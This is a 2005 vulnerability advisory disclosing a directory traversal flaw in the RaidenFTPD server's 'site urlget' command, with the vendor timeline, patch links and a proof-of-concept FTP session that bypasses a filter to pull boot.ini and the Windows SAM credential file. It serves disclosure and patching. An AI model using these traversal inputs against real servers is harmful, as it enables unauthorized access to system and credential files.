Product : RaidenFTPD Affected Versions : < 2.4.2241 *** Author: Lachlan. H Date vendor notified: 19/04/2005 Patch released: 20/04/2005 Disclosure: 02/05/2005 *** Product Description: RaidenFTPD is an easy-to-use ftp server software for Windows?. With this handy tool you can share your files with friends, provide file download services to customers or even setup your own private network file server. Not only are all the basic FTP server features built-in; it also features various advanced features such as SSL/TLS, UTF8, UPnP NAT traversal and more .. *** Problem: Directory Traversal - Failure to validate input for the site command 'urlget'. Using urlget it's possible for a normal user to escape ftproot and download known files from restricted directories. The JohnLong Team acted promptly to resolve the issue. *** Fix: http://www.raidenftpd.com/en/ FULL : http://www.raidenmaild.com/download/raidenftpd2.exe UPDATE : http://www.raidenmaild.com/download/update.exe *** PoC: 230 User ****** logged in. ftp> quote site urlget file://\..\\boot.ini 550 site urlget failed : hacking attempt , you have been logged. ftp> quote site urlget file:/..\\boot.ini 220 site urlget : downloading file:/..\\boot.ini->boot.ini ftp> ls 200 Port command ok. 150 Opening ASCII data connection for ls /. boot.ini 226-free disk space under this directory : 28919 mb 226 Transfer finished successfully. Data connection closed . ftp: 10 bytes received in 0.00 Seconds 10000.00Kbytes/sec. ftp> quote site urlget file:/..\\winnt/repair/sam 220 site urlget : downloading file:/..\\winnt/repair/sam->sam ftp> ls 200 Port command ok. 150 Opening ASCII data connection for ls /. boot.ini sam 226-free disk space under this directory : 28919mb 226 Transfer finished successfully. Data connection closed . ftp: 15 bytes received in 0.00Seconds 15000.00Kbytes/sec. ftp> *** __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com